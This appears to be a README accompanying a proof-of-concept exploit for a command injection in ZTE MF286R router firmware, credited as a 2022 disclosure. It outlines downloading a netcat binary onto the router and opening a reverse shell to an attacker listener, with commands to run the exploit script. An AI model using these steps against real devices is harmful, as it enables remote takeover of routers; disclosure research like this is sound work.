Firmware details:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
- requests (
pip install requests)
The vulnerability is a shared command injection between the zte_net_link_detect binary and the WATCH_DOG_SWITCH handler in the webserver goahead binary.
Note that the vulnerability can only be exploited when the router is connected to the WAN or connected to the Internet via a SIM card. (The value of the "ppp_status" key must be "ppp_connected" or "ipv4_ipv6_connected" or "ipv6_connected").
- Remote code execution (RCE)
- Arbitrary command execution
The idea of exploit is to download the netcat static binary from an http server and then open a reverse shell with it. P.S: The netcat included in this folder is big endian.
- Open an http server in this directory
python3 -m http.server 8080 - Open a listening socket on port
9999withnc -lvp 9999 - Run the script in this folder
python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>
This vulnerability was reported by Andrea Maugeri in September 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664